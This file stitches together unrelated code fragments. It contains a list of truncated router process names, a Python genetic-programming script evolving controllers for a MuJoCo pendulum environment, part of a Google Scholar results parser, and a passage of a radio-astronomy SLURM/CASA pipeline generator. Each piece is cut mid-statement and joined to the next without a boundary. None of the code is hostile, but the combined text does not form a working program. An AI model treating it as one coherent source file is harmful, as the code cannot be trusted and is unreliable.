'ACCT Periodic Pr',
'cdp init process',
'Call Home Timer',
'CEF switching ba',
'ADJ NSF process',
'AAA Dictionary R',
'FHRP Main thread',
'TRACK Main threa',
'TRACK Client thr',
'VRRP Main thread',
'ATM OAM Input',
'ATM OAM TIMER',
'HQF TARGET DYNAM',
'IP ARP Adjacency',
'IP Input',
'ICMP event handl',
'mDNS',
'PIM register asy',
'IPv6 ping proces',
'BGP Scheduler',
'MOP Protocols',
'PPP SIP',
'PPP Bind',
'PPP IP Route',
'LSP Verification',
'RIB LM VALIDATE',
'SSM connection m',
'SSS Manager',
'SSS Policy Manag',
'SSS Feature Mana',
'SSS Feature Time',
'Spanning Tree',
'VRRS',
'Ethernet LMI',
'Ethernet OAM Pro',
'Ethernet CFM',
'mcp callhome per',
'PPCP RP Stats Ba',
'Appnav auto disc',
'L2FIB Timer Disp',
'MLRIB L2 Msg Thr',
'Spanning Tree St',
'IGMP Route Msg H',
'IGMP | |
<reponame>ferreirajoaouerj/gp-openai-gym
#-*- coding:utf-8 -*-
"""
Documentation
"""
######################################################################################################
import os
import pickle
import time
import copy
from collections import defaultdict
import random
import operator
import numpy as np
from deap import base
from deap import creator
from deap import gp
from deap import tools
from deap import algorithms
import matplotlib.pyplot as plt
from matplotlib import colors
import networkx as nx
import gym
import pybulletgym
######################################################################################################
#################################### PARÂMETROS ######################################################
######################################################################################################
random.seed(0)
param_pg = {
'tam_pop': 500,
'pb_cx': 0.75,
'pb_mut': 0.05,
'n_geracoes': 15,
'tipo_apt': 1.0,
'n_entradas': 11,
'faixa_cst': [-1, 1],
'n_episodios': 10,
'camp_apt': 6,
'camp_d': 1.2,
'd_min': 2,
'd_max': 5,
'max_d_mut': 7,
'limite_d': 17,
}
param_aux = {
'n_exec': 10,
'amb': gym.make('InvertedDoublePendulumMuJoCoEnv-v0'),
'mujoco': True
}
param_graf = {
'nomes_var_tex': (r"$s$", r'$\sin{(\theta)}$', r'$\sin{(\gamma)}$', r'$\cos{(\theta)}$', r'$\cos{(\gamma)}$',
r'$\dot{s}$', r'$\dot{\theta}$', r'$\dot{\gamma}$',
r'$f_r(s)$', r'$f_r(\theta)$', r'$f_r(\gamma)$'),
'plot_var': ('Ação', r"$s$", r'$\sin{(\theta)}$', r'$\sin{(\gamma)}$'),
'operadores': {'add': r'$+$', 'sub': r'$-$', 'mul': r'$\times$', 'div': r'$\div$',
'gt': r'$>$', 'sr': r'$\sqrt{\,}$', 'sen': r'$\sin$', 'sgn': 'sgn',
'constante': r'$R$'},
'hist_n_linhas': 3,
'hist_n_cols': 2,
'bins_min': 0,
'bins_max': 11000,
'bins_passo': 1000
}
var_aux = {
'n_dt': 0,
'n_simul': 0,
't_exec': 0
}
param_store = {
'pg': param_pg,
'aux': param_aux,
'graf': param_graf,
'var_aux': var_aux
}
script_filename = os.path.basename(__file__)
store_filename = script_filename.replace(".py", "_Stats.pkl")
######################################################################################################
################################ FUNÇÕES AUXLIARES - AVALIAÇÃO DE INDIVÍDUO ##########################
######################################################################################################
def wrap(num):
if num >= 1.0:
return np.array([1.0], dtype='float32')
elif num <= -1.0:
return np.array([-1.0], dtype='float32')
else:
return np.array([num], dtype='float32')
def calc_custo_inst(obs=None, recomp=None, last=None):
return 0
def calc_custo_acum(obs=None, recomp=None, ult_obs=None):
return recomp
def calc_custo(custo_inst=None, custo_acum=None, obs=None, recomp=None):
return custo_acum
def avaliar_individuo(ind, num_episodios=param_pg['n_episodios'], num_entradas=param_pg['n_entradas'],
ambiente=param_aux['amb'], nomes_var=param_graf['nomes_var_tex'],
plotar_var=param_graf['plot_var'], graficos=False, video=False, mujoco=param_aux['mujoco']):
aptidoes = []
tempo = 0
dic_stats = {'Tempo': [], 'Resultado': [], 'Acao': [], 'Custo Acumulado': []}
funcao_de_controle = toolbox.compilar_individuo(ind)
for obs in range(num_entradas):
dic_stats['ARG' + str(obs)] = []
if graficos or video:
num_episodios = 1
# if mujoco and video:
# ambiente.render()
for episodio in range(num_episodios):
var_aux['n_simul'] += 1
tempo_ep = 0
custo_acumulado = custo_instantaneo = 0
termino = False
observacao = ambiente.reset()
while not termino:
var_aux['n_dt'] += 1
tempo_ep += 1
resultado = funcao_de_controle(*tuple(observacao))
acao = wrap(resultado)
observacao, recompensa, termino, info = ambiente.step(acao)
custo_instantaneo = calc_custo_inst()
custo_acumulado += calc_custo_acum(recomp=recompensa)
custo = calc_custo(custo_acum=custo_acumulado)
if video and not mujoco:
ambiente.render()
if graficos:
tempo += 1
dic_stats['Tempo'].append(tempo), dic_stats['Resultado'].append(resultado),
dic_stats['Acao'].append(acao), dic_stats['Custo Acumulado'].append(custo_acumulado)
for obs in range(num_entradas):
dic_stats['ARG' + str(obs)].append(observacao[obs])
aptidoes.append(custo)
aptidao_media = np.average(aptidoes)
if graficos:
plotar_vars_avaliacao_melhor(data=dic_stats, nomes_var=nomes_var,
plotar_var=plotar_var, tempo_final=500)
if not mujoco:
ambiente.close()
return aptidao_media,
######################################################################################################
############################# FUNÇÕES AUXLIARES - COMPILAÇÃO DE ESTATÍSTICAS #########################
######################################################################################################
def get_data(l):
new = []
for i in l:
if not np.isnan(i):
new.append(i)
return new
def minimo(lista):
array = np.array(lista)
array = array[~np.isnan(array)]
return np.min(array)
def maximo(lista):
array = np.array(lista)
array = array[~np.isnan(array)]
return np.max(array)
def media(lista):
array = np.array(lista)
array = array[~np.isnan(array)]
return np.average(array)
def desvio(lista):
array = np.array(lista)
array = array[~np.isnan(array)]
return np.std(array)
def copiar_estatisticas(logbk=None):
newdic = {}
for key in logbk.chapters.keys():
newdic[key] = {}
for key in logbk.chapters.keys():
newdic[key].update(max=logbk.chapters[key].select('max'), min=logbk.chapters[key].select('min'),
media=logbk.chapters[key].select('media'), desvio=logbk.chapters[key].select('desvio'),
ocorrencias=logbk.chapters[key].select('ocorrencias'), gen=logbk.select('gen'))
return newdic
def contar_operadores(conjprim, pop):
op_count_dict = {'constante': 0}
valores_constantes = []
for op in conjprim.primitives[object]:
if not op_count_dict.keys().__contains__(op.name):
op_count_dict[op.name] = 0
for arg in conjprim.arguments:
if not op_count_dict.keys().__contains__(arg):
op_count_dict[arg] = 0
for individuo in pop:
for no in individuo:
if 'ARG' not in no.name:
if not op_count_dict.keys().__contains__(no.name):
op_count_dict['constante'] += 1
valores_constantes.append(no.value)
else:
op_count_dict[no.name] += 1
else:
op_count_dict[no.value] += 1
return op_count_dict, valores_constantes
def media_estatisticas(stat_dic_list: list, occ_dic_list: list, const_list: list):
for stat_dict in stat_dic_list:
for key in stat_dict.keys():
for subkey in estatisticas[key]:
stat_dict[key][subkey] = np.array(stat_dict[key][subkey])
for occ_dic in occ_dic_list:
for key in occ_dic.keys():
occ_dic[key] = np.array(occ_dic[key])
sum_dict = copy.deepcopy(stat_dic_list[0])
occ_sum = copy.deepcopy(occ_dic_list[0])
for stat_dict in stat_dic_list[1:]:
for key in stat_dict.keys():
for subkey in estatisticas[key]:
sum_dict[key][subkey] += stat_dict[key][subkey]
for key in sum_dict.keys():
for subkey in sum_dict[key].keys():
sum_dict[key][subkey] = sum_dict[key][subkey] / len(stat_dic_list)
for occ_dic in occ_dic_list[1:]:
for key in occ_dic.keys():
occ_sum[key] += occ_dic[key]
for key in occ_sum.keys():
occ_sum[key] = occ_sum[key] / len(occ_dic_list)
const_avg_list = []
for cst_lst in const_list:
if len(cst_lst) < 1:
const_avg_list.append(0)
else:
const_avg_list.append(np.average(cst_lst))
const_avg = np.average(const_avg_list)
return sum_dict, occ_sum, const_avg
def calcular_media_exec(lista_dic_stats, lista_dic_occ, lista_lista_const):
bins = np.arange(param_graf['bins_min'], param_graf['bins_max'], param_graf['bins_passo'])
n_mat_list = []
# occ_mat = np.ndarray(shape=(param_pg['n_geracoes'] + 1, param_pg['tam_pop']))
occ_mat = []
for dic_stats in lista_dic_stats:
for key in dic_stats.keys():
for subkey in dic_stats[key].keys():
if subkey != 'ocorrencias':
dic_stats[key][subkey] = np.array(dic_stats[key][subkey], dtype='float64')
elif key == 'aptidao' and subkey == 'ocorrencias':
occ_mat = []
for ger, lista_occ in enumerate(dic_stats[key][subkey]):
n, bins = np.histogram(lista_occ, bins=bins)
occ_mat.append(n)
n_mat_list.append(occ_mat)
mat_acum = np.asarray(n_mat_list[0])
for mat in n_mat_list[1:]:
mat_acum += np.asarray(mat)
n_avg = []
for i in range(len(mat_acum[0])):
n_avg.append(mat_acum[i] / len(n_mat_list))
new_apt_ocorrencias = []
for i in range(len(n_avg)):
new_apt_ocorrencias.append([])
for j in range(len(n_avg[i])):
new_apt_ocorrencias[i].append(random.randint(bins[i], bins[i + 1]))
lista_lista_const = np.array([np.array(x) for x in lista_lista_const])
dic_stats_acum = copy.deepcopy(lista_dic_stats[0])
dic_occ_acum = copy.deepcopy(lista_dic_occ[0])
const_acum = 0
n = len(lista_lista_const)
for dic_stats in lista_dic_stats[1:]:
for key in dic_stats.keys():
for subkey in dic_stats[key]:
if subkey != 'ocorrencias':
dic_stats_acum[key][subkey] = np.add(dic_stats_acum[key][subkey],
dic_stats[key][subkey])
for key in dic_stats_acum.keys():
for subkey in dic_stats_acum[key].keys():
if subkey != 'ocorrencias':
dic_stats_acum[key][subkey] = dic_stats_acum[key][subkey] / n
dic_stats_media = dic_stats_acum
for dic_occ in lista_dic_occ[1:]:
for key in dic_occ.keys():
dic_occ_acum[key] += dic_occ[key]
for label in dic_occ_acum.keys():
dic_occ_acum[label] = dic_occ_acum[label] / n
dic_occ_media = dic_occ_acum
for lista_const in lista_lista_const:
if len(lista_const) > 0:
const_acum += np.average(np.nan_to_num(lista_const))
const_med = const_acum / n
return dic_stats_media, dic_occ_media, const_med
######################################################################################################
############################# FUNÇÕES AUXLIARES - GERAÇÃO DE GRÁFICOS ################################
######################################################################################################
def plotar_arvore(ind):
plt.figure()
nodes, edges, labels = gp.graph(ind)
for label_key, label_value in labels.items():
for op_key, op_value in param_graf['operadores'].items():
if str(label_value) == op_key:
labels[label_key] = op_value
for i in range(param_pg['n_entradas']):
for key, value in labels.items():
if value == ('ARG' + str(i)):
labels[key] = param_graf['nomes_var_tex'][i]
g = nx.Graph()
g.add_nodes_from(nodes)
g.add_edges_from(edges)
pos = nx.drawing.nx_agraph.graphviz_layout(g, prog="dot")
nx.draw_networkx_nodes(g, pos, node_size=900, node_color='black')
nx.draw_networkx_edges(g, pos)
nx.draw_networkx_labels(g, pos, labels, font_color='white', font_size=10)
plt.show()
def plotar_vars_avaliacao(data=None, nomes_var=None, plotar_var=None, tempo_final=None):
figura, eixo = plt.subplots(nrows=len(plotar_var), ncols=1, sharex='all')
data['Ação'] = data.pop('Acao')
for n in range(len(nomes_var)):
data[nomes_var[n]] = data.pop('ARG' + str(n))
if len(plotar_var) < 2:
eixo.plot('Tempo', plotar_var[0], data=data, ls='-.', marker='o', ms=5, color='blue', alpha=0.5)
eixo.set_xlabel('Tempo')
eixo.set_ylabel(plotar_var[0])
eixo.grid()
else:
cores = ['b', 'g', 'r', 'm', 'c']
for var in range(len(plotar_var)):
eixo[var].plot('Tempo', plotar_var[var], data=data, ls='-.', marker='o', ms=5, color=cores[var], alpha=0.5)
eixo[var].set_ylabel(plotar_var[var])
eixo[var].grid(True)
eixo[-1].set_xlabel('Tempo') # nome apenas no último gráfico
eixo[-1].set_xlim(0, tempo_final)
def plotar_vars_avaliacao_melhor(data=None, nomes_var=None, plotar_var=None, tempo_final=1000):
figura, eixo = plt.subplots(nrows=len(plotar_var), ncols=1, sharex='all')
data['Ação'] = data.pop('Acao')
for n in range(len(nomes_var)):
data[nomes_var[n]] = data.pop('ARG' + str(n))
if len(plotar_var) < 2:
eixo.plot('Tempo', plotar_var[0], data=data, ls='-', marker='.', ms=3, color='blue', alpha=0.5)
eixo.set_xlabel('Tempo')
eixo.set_ylabel(plotar_var[0])
eixo.grid()
else:
cores = ['b', 'g', 'r', 'm', 'c']
for var in range(len(plotar_var)):
eixo[var].plot('Tempo', plotar_var[var], data=data, ls='-', marker='.', ms=3, color=cores[var], alpha=0.5)
eixo[var].set_ylabel(plotar_var[var])
eixo[var].grid(True)
eixo[-1].set_xlabel('Tempo') # nome apenas no último gráfico
eixo[-1].set_xlim(0, tempo_final)
def plotar_hits(data=None, nrows=param_graf['hist_n_linhas'], ncols=param_graf['hist_n_cols'],
bins_min=param_graf['bins_min'], bins_max=param_graf['bins_max'], bins_step=param_graf['bins_passo']):
fig, eixo = plt.subplots(nrows=nrows, ncols=ncols, sharex='all', sharey='all', constrained_layout=True)
norm = colors.Normalize(bins_min, bins_max - bins_step)
dados = data['aptidao']['ocorrencias']
graf = (np.round(np.linspace(0, len(dados)-1, nrows*ncols))).astype('int')
n = 0
for j in range(ncols):
for i in range(nrows):
N, bins, patches = eixo[i][j].hist(dados[graf[n]], bins=np.arange(bins_min, bins_max, bins_step))
for thisbin, thispatch in zip(bins, patches):
color = plt.cm.viridis(norm(thisbin))
thispatch.set_facecolor(color)
eixo[i][j].set_title('Geração ' + str(graf[n]))
eixo[i][j].set_ylabel('Ocorrencias') if j is 0 else None
eixo[i][j].set_xlabel('Aptidão') if i is (nrows-1) else None
n += 1
def plotar_estatisticas_evolucao(data=None):
stats = ['aptidao', 'comprimento', 'complexidade']
labels = ['Aptidão', 'Comprimento', 'Complexidade']
ls = '-.'
lw = 1
ms = 7
for stats, labels in zip(stats, labels):
fig, eixo = plt.subplots()
fig.suptitle(stats.capitalize() + ' por Geração', fontsize=14)
eixo.plot('gen', 'min', 'bv:', data=data[stats], label=labels + ' Min', ls=ls, markersize=ms, lw=lw)
eixo.plot('gen', 'max', 'r^:', data=data[stats], label=labels + ' Max', ls=ls, markersize=ms, lw=lw)
eixo.plot('gen', 'media', 'g>:', data=data[stats], label=labels + ' Med', ls=ls, markersize=ms, lw=lw)
eixo.set_xlabel('Geração')
eixo.set_ylabel(stats.capitalize())
if stats is 'aptidao':
fig.suptitle('Aptidão por Geração', fontsize=14)
apt = data[stats]
eixo.fill_between('gen', [x + y for x, y in zip(apt['media'], apt['desvio'])],
[x - y for x, y in zip(apt['media'], apt['desvio'])], data=apt, label='Desvio Padrão',
alpha=0.2, edgecolor='#1B2ACC', facecolor='#089FFF', linewidth=0.1,
linestyle='dashed', antialiased=True)
eixo.set_ylabel('Aptidão')
eixo.legend(loc='best')
plt.xlim(-0.1, len(data[stats]['gen']) - 0.9)
eixo.grid()
def plotar_ocorrencias(data=None):
newdic = copy.deepcopy(data)
for i in range(param_pg['n_entradas']):
newdic[param_graf['nomes_var_tex'][i]] = newdic.pop('ARG' + str(i))
for key in data.keys():
if param_graf['operadores'].__contains__(key):
newdic[param_graf['operadores'][key]] = newdic.pop(key)
fig, eixo = plt.subplots()
bars = plt.bar(*zip(*newdic.items()))
ax = bars[0].axes
lim = ax.get_xlim() + ax.get_ylim()
for bar in bars:
bar.set_zorder(1)
bar.set_facecolor("none")
x, y = bar.get_xy()
w, h = bar.get_width(), bar.get_height()
grad = np.atleast_2d(np.linspace(0, h / max(data.values()), 256))
eixo.imshow(grad.transpose(), extent=[x, x + w, y + h, y], aspect="auto", zorder=0,
norm=colors.NoNorm(vmin=0, vmax=1))
ax.axis(lim)
def avaliar_hdf(hdf, env):
aptidoes = []
for ind in hdf[:10]:
aptidao, = avaliar_individuo(ind, num_episodios=100, ambiente=env)
aptidoes.append(aptidao)
aptidao_media_melhores = np.sum(aptidoes) / len(aptidoes)
| |
a user-suitable label for the item, and (3) an
# ordering index:
self.attrs = {
'title': [None, 'Title', 0],
'url': [None, 'URL', 1],
'year': [None, 'Year', 2],
'num_citations': [0, 'Citations', 3],
'num_versions': [0, 'Versions', 4],
'cluster_id': [None, 'Cluster ID', 5],
'url_pdf': [None, 'PDF link', 6],
'url_citations': [None, 'Citations list', 7],
'url_versions': [None, 'Versions list', 8],
'url_citation': [None, 'Citation link', 9],
'excerpt': [None, 'Excerpt', 10],
}
# The citation data in one of the standard export formats,
# e.g. BibTeX.
self.citation_data = None
def __getitem__(self, key):
if key in self.attrs:
return self.attrs[key][0]
return None
def __len__(self):
return len(self.attrs)
def __setitem__(self, key, item):
if key in self.attrs:
self.attrs[key][0] = item
else:
self.attrs[key] = [item, key, len(self.attrs)]
def __delitem__(self, key):
if key in self.attrs:
del self.attrs[key]
def set_citation_data(self, citation_data):
self.citation_data = citation_data
def as_txt(self):
# Get items sorted in specified order:
items = sorted(list(self.attrs.values()), key=lambda item: item[2])
# Find largest label length:
max_label_len = max([len(str(item[1])) for item in items])
fmt = '%%%ds %%s' % max_label_len
res = []
for item in items:
if item[0] is not None:
res.append(fmt % (item[1], item[0]))
return '\n'.join(res)
def as_csv(self, header=False, sep='|'):
# Get keys sorted in specified order:
keys = [pair[0] for pair in \
sorted([(key, val[2]) for key, val in list(self.attrs.items())],
key=lambda pair: pair[1])]
res = []
if header:
res.append(sep.join(keys))
res.append(sep.join([unicode(self.attrs[key][0]) for key in keys]))
return '\n'.join(res)
def as_citation(self):
"""
Reports the article in a standard citation format. This works only
if you have configured the querier to retrieve a particular
citation export format. (See ScholarSettings.)
"""
return self.citation_data or ''
class ScholarArticleParser(object):
"""
ScholarArticleParser can parse HTML document strings obtained from
Google Scholar. This is a base class; concrete implementations
adapting to tweaks made by Google over time follow below.
"""
def __init__(self, site=None):
self.soup = None
self.article = None
self.site = site or ScholarConf.SCHOLAR_SITE
self.year_re = re.compile(r'\b(?:20|19)\d{2}\b')
def handle_article(self, art):
"""
The parser invokes this callback on each article parsed
successfully. In this base class, the callback does nothing.
"""
def handle_num_results(self, num_results):
"""
The parser invokes this callback if it determines the overall
number of results, as reported on the parsed results page. The
base class implementation does nothing.
"""
def parse(self, html):
"""
This method initiates parsing of HTML content, cleans resulting
content as needed, and notifies the parser instance of
resulting instances via the handle_article callback.
"""
self.soup = SoupKitchen.make_soup(html)
# This parses any global, non-itemized attributes from the page.
self._parse_globals()
# Now parse out listed articles:
for div in self.soup.findAll(ScholarArticleParser._tag_results_checker):
self._parse_article(div)
self._clean_article()
if self.article['title']:
self.handle_article(self.article)
def _clean_article(self):
"""
This gets invoked after we have parsed an article, to do any
needed cleanup/polishing before we hand off the resulting
article.
"""
if self.article['title']:
self.article['title'] = self.article['title'].strip()
def _parse_globals(self):
tag = self.soup.find(name='div', attrs={'id': 'gs_ab_md'})
if tag is not None:
raw_text = tag.findAll(text=True)
# raw text is a list because the body contains <b> etc
if raw_text is not None and len(raw_text) > 0:
try:
num_results = raw_text[0].split()[1]
# num_results may now contain commas to separate
# thousands, strip:
num_results = num_results.replace(',', '')
num_results = int(num_results)
self.handle_num_results(num_results)
except (IndexError, ValueError):
pass
def _parse_article(self, div):
self.article = ScholarArticle()
for tag in div:
if not hasattr(tag, 'name'):
continue
if tag.name == 'div' and self._tag_has_class(tag, 'gs_rt') and \
tag.h3 and tag.h3.a:
self.article['title'] = ''.join(tag.h3.a.findAll(text=True))
self.article['url'] = self._path2url(tag.h3.a['href'])
if self.article['url'].endswith('.pdf'):
self.article['url_pdf'] = self.article['url']
if tag.name == 'font':
for tag2 in tag:
if not hasattr(tag2, 'name'):
continue
if tag2.name == 'span' and \
self._tag_has_class(tag2, 'gs_fl'):
self._parse_links(tag2)
def _parse_links(self, span):
for tag in span:
if not hasattr(tag, 'name'):
continue
if tag.name != 'a' or tag.get('href') is None:
continue
if tag.get('href').startswith('/scholar?cites'):
if hasattr(tag, 'string') and tag.string.startswith('Cited by'):
self.article['num_citations'] = \
self._as_int(tag.string.split()[-1])
# Weird Google Scholar behavior here: if the original
# search query came with a number-of-results limit,
# then this limit gets propagated to the URLs embedded
# in the results page as well. Same applies to
# versions URL in next if-block.
self.article['url_citations'] = \
self._strip_url_arg('num', self._path2url(tag.get('href')))
# We can also extract the cluster ID from the versions
# URL. Note that we know that the string contains "?",
# from the above if-statement.
args = self.article['url_citations'].split('?', 1)[1]
for arg in args.split('&'):
if arg.startswith('cites='):
self.article['cluster_id'] = arg[6:]
if tag.get('href').startswith('/scholar?cluster'):
if hasattr(tag, 'string') and tag.string.startswith('All '):
self.article['num_versions'] = \
self._as_int(tag.string.split()[1])
self.article['url_versions'] = \
self._strip_url_arg('num', self._path2url(tag.get('href')))
if tag.getText().startswith('Import'):
self.article['url_citation'] = self._path2url(tag.get('href'))
@staticmethod
def _tag_has_class(tag, klass):
"""
This predicate function checks whether a BeatifulSoup Tag instance
has a class attribute.
"""
res = tag.get('class') or []
if type(res) != list:
# BeautifulSoup 3 can return e.g. 'gs_md_wp gs_ttss',
# so split -- conveniently produces a list in any case
res = res.split()
return klass in res
@staticmethod
def _tag_results_checker(tag):
return tag.name == 'div' \
and ScholarArticleParser._tag_has_class(tag, 'gs_r')
@staticmethod
def _as_int(obj):
try:
return int(obj)
except ValueError:
return None
def _path2url(self, path):
"""Helper, returns full URL in case path isn't one."""
if path.startswith('http://'):
return path
if not path.startswith('/'):
path = '/' + path
return self.site + path
def _strip_url_arg(self, arg, url):
"""Helper, removes a URL-encoded argument, if present."""
parts = url.split('?', 1)
if len(parts) != 2:
return url
res = []
for part in parts[1].split('&'):
if not part.startswith(arg + '='):
res.append(part)
return parts[0] + '?' + '&'.join(res)
class ScholarArticleParser120201(ScholarArticleParser):
"""
This class reflects update to the Scholar results page layout that
Google recently.
"""
def _parse_article(self, div):
self.article = ScholarArticle()
for tag in div:
if not hasattr(tag, 'name'):
continue
if tag.name == 'h3' and self._tag_has_class(tag, 'gs_rt') and tag.a:
self.article['title'] = ''.join(tag.a.findAll(text=True))
self.article['url'] = self._path2url(tag.a['href'])
if self.article['url'].endswith('.pdf'):
self.article['url_pdf'] = self.article['url']
if tag.name == 'div' and self._tag_has_class(tag, 'gs_a'):
year = self.year_re.findall(tag.text)
self.article['year'] = year[0] if len(year) > 0 else None
if tag.name == 'div' and self._tag_has_class(tag, 'gs_fl'):
self._parse_links(tag)
class ScholarArticleParser120726(ScholarArticleParser):
"""
This class reflects update to the Scholar results page layout that
Google made 07/26/12.
"""
def _parse_article(self, div):
self.article = ScholarArticle()
for tag in div:
if not hasattr(tag, 'name'):
continue
if str(tag).lower().find('.pdf'):
if tag.find('div', {'class': 'gs_ttss'}):
self._parse_links(tag.find('div', {'class': 'gs_ttss'}))
if tag.name == 'div' and self._tag_has_class(tag, 'gs_ri'):
# There are (at least) two formats here. In the first
# one, we have a link, e.g.:
#
# <h3 class="gs_rt">
# <a href="http://dl.acm.org/citation.cfm?id=972384" class="yC0">
# <b>Honeycomb</b>: creating intrusion detection signatures using
# honeypots
# </a>
# </h3>
#
# In the other, there's no actual link -- it's what
# Scholar renders as "CITATION" in the HTML:
#
# <h3 class="gs_rt">
# <span class="gs_ctu">
# <span class="gs_ct1">[CITATION]</span>
# <span class="gs_ct2">[C]</span>
# </span>
# <b>Honeycomb</b> automated ids signature creation using honeypots
# </h3>
#
# We now distinguish the two.
try:
atag = tag.h3.a
self.article['title'] = ''.join(atag.findAll(text=True))
self.article['url'] = self._path2url(atag['href'])
if self.article['url'].endswith('.pdf'):
self.article['url_pdf'] = self.article['url']
except:
# Remove a few spans that have unneeded content (e.g. [CITATION])
for span in tag.h3.findAll(name='span'):
span.clear()
self.article['title'] = ''.join(tag.h3.findAll(text=True))
if tag.find('div', {'class': 'gs_a'}):
year = self.year_re.findall(tag.find('div', {'class': 'gs_a'}).text)
self.article['year'] = year[0] if len(year) > 0 else None
if tag.find('div', {'class': 'gs_fl'}):
self._parse_links(tag.find('div', {'class': 'gs_fl'}))
if tag.find('div', {'class': 'gs_rs'}):
# These are the content excerpts rendered into the results.
raw_text = tag.find('div', {'class': 'gs_rs'}).findAll(text=True)
if len(raw_text) > 0:
raw_text = ''.join(raw_text)
raw_text = raw_text.replace('\n', '')
self.article['excerpt'] = raw_text
class ScholarQuery(object):
"""
The base class for any kind of results query we send to Scholar.
"""
def __init__(self):
self.url = None
# The number of results requested from Scholar -- not the
# total number of results it reports (the latter gets stored
# in attrs, see below).
self.num_results = None
# Queries may have global result attributes, similar to
# per-article attributes in ScholarArticle. The exact set of
# attributes may differ by query type, but they all share the
# basic data structure:
self.attrs = {}
def set_num_page_results(self, num_page_results):
self.num_results = ScholarUtils.ensure_int(
num_page_results,
'maximum number of results on page must be numeric')
def get_url(self):
"""
Returns a complete, submittable URL string for this particular
query | |
i,script in enumerate(scripts):
jobname = os.path.splitext(os.path.split(script)[1])[0]
#Use input SLURM configuration for threadsafe tasks, otherwise call srun with single node and single thread
if threadsafe[i]:
write_sbatch(script,'--config {0}'.format(TMP_CONFIG),nodes=nodes,tasks=ntasks_per_node,mem=mem,plane=plane,exclude=exclude,mpi_wrapper=mpi_wrapper,
container=containers[i],partition=partition,time=time,name=jobname,runname=name,SPWs=crosscal_kwargs['spw'],nspw=crosscal_kwargs['nspw'],account=account,reservation=reservation,justrun=justrun)
else:
write_sbatch(script,'--config {0}'.format(TMP_CONFIG),nodes=1,tasks=1,mem=mem,plane=1,mpi_wrapper='srun',container=containers[i],
partition=partition,time=time,name=jobname,runname=name,SPWs=crosscal_kwargs['spw'],nspw=crosscal_kwargs['nspw'],exclude=exclude,account=account,reservation=reservation,justrun=justrun)
#Replace all .py with .sbatch
scripts = [os.path.split(scripts[i])[1].replace('.py','.sbatch') for i in range(len(scripts))]
precal_scripts = scripts[:num_precal_scripts]
postcal_scripts = scripts[num_precal_scripts:]
echo = False if quiet else True
if crosscal_kwargs['nspw'] > 1:
#Build master master script, calling each of the separate SPWs at once, precal scripts before this, and postcal scripts after this
write_spw_master(MASTER_SCRIPT,config,SPWs=crosscal_kwargs['spw'],precal_scripts=precal_scripts,postcal_scripts=postcal_scripts,submit=submit,pad_length=pad_length,dependencies=dependencies,timestamp=timestamp,slurm_kwargs=kwargs)
else:
#Build master pipeline submission script
write_master(MASTER_SCRIPT,config,scripts=scripts,submit=submit,pad_length=pad_length,verbose=verbose,echo=echo,dependencies=dependencies,slurm_kwargs=kwargs)
def default_config(arg_dict):
"""Generate default config file in current directory, pointing to MS, with fields and SLURM parameters set.
Arguments:
----------
arg_dict : dict
Dictionary of arguments passed into this script, which is inserted into the config file under various sections."""
filename = arg_dict['config']
MS = arg_dict['MS']
#Copy default config to current location
copyfile('{0}/{1}'.format(SCRIPT_DIR,CONFIG),filename)
#Add SLURM CL arguments to config file under section [slurm]
slurm_dict = get_slurm_dict(arg_dict,SLURM_CONFIG_KEYS)
for key in SLURM_CONFIG_STR_KEYS:
if key in slurm_dict.keys(): slurm_dict[key] = "'{0}'".format(slurm_dict[key])
#Overwrite CL parameters in config under section [slurm]
config_parser.overwrite_config(filename, conf_dict=slurm_dict, conf_sec='slurm')
#Add MS to config file under section [data] and dopol under section [run]
config_parser.overwrite_config(filename, conf_dict={'vis' : "'{0}'".format(MS)}, conf_sec='data')
config_parser.overwrite_config(filename, conf_dict={'dopol' : arg_dict['dopol']}, conf_sec='run', sec_comment='# Internal variables for pipeline execution')
if not arg_dict['do2GC'] or not arg_dict['science_image']:
remove_scripts = []
if not arg_dict['do2GC']:
config_parser.remove_section(filename, 'selfcal')
remove_scripts = ['selfcal_part1.py', 'selfcal_part2.py']
if not arg_dict['science_image']:
config_parser.remove_section(filename, 'image')
remove_scripts += ['science_image.py']
scripts = arg_dict['postcal_scripts']
i = 0
while i < len(scripts):
if scripts[i][0] in remove_scripts:
scripts.pop(i)
i -= 1
i += 1
config_parser.overwrite_config(filename, conf_dict={'postcal_scripts' : scripts}, conf_sec='slurm')
if not arg_dict['nofields']:
#Don't call srun if option --local used
if arg_dict['local']:
mpi_wrapper = ''
else:
mpi_wrapper = srun(arg_dict)
#Write and submit srun command to extract fields, and insert them into config file under section [fields]
params = '-B -M {MS} -C {config} -N {nodes} -t {ntasks_per_node}'.format(**arg_dict)
if arg_dict['dopol']:
params += ' -P'
if arg_dict['verbose']:
params += ' -v'
command = write_command('read_ms.py', params, mpi_wrapper=mpi_wrapper, container=arg_dict['container'],logfile=False)
logger.info('Extracting field IDs from MeasurementSet "{0}" using CASA.'.format(MS))
logger.debug('Using the following command:\n\t{0}'.format(command))
os.system(command)
else:
#Skip extraction of field IDs and assume we're not processing multiple SPWs
logger.info('Skipping extraction of field IDs and assuming nspw=1.')
config_parser.overwrite_config(filename, conf_dict={'nspw' : 1}, conf_sec='crosscal')
#If dopol=True, replace second call of xx_yy_* scripts with xy_yx_* scripts
#Check in config (not CL args), in case read_ms.py forces dopol=False, and assume we only want to set this for 'scripts'
dopol = config_parser.get_key(filename, 'run', 'dopol')
if dopol:
count = 0
for ind, ss in enumerate(arg_dict['scripts']):
if ss[0] == 'xx_yy_solve.py' or ss[0] == 'xx_yy_apply.py':
count += 1
if count > 2:
if ss[0] == 'xx_yy_solve.py':
arg_dict['scripts'][ind] = ('xy_yx_solve.py',arg_dict['scripts'][ind][1],arg_dict['scripts'][ind][2])
if ss[0] == 'xx_yy_apply.py':
arg_dict['scripts'][ind] = ('xy_yx_apply.py',arg_dict['scripts'][ind][1],arg_dict['scripts'][ind][2])
config_parser.overwrite_config(filename, conf_dict={'scripts' : arg_dict['scripts']}, conf_sec='slurm')
logger.info('Config "{0}" generated.'.format(filename))
def get_slurm_dict(arg_dict,slurm_config_keys):
"""Build a slurm dictionary to be inserted into config file, using specified keys.
Arguments:
----------
arg_dict : dict
Dictionary of arguments passed into this script, which is inserted into the config file under section [slurm].
slurm_config_keys : list
List of keys from arg_dict to insert into config file.
Returns:
--------
slurm_dict : dict
Dictionary to insert into config file under section [slurm]."""
slurm_dict = {key:arg_dict[key] for key in slurm_config_keys}
return slurm_dict
def pop_script(kwargs,script):
"""Pop script from list of scripts, list of threadsafe tasks, and list of containers.
Arguments:
----------
kwargs : : dict
Keyword arguments extracted from [slurm] section of config file, to be passed into write_jobs() function.
script : str
Name of script.
Returns:
--------
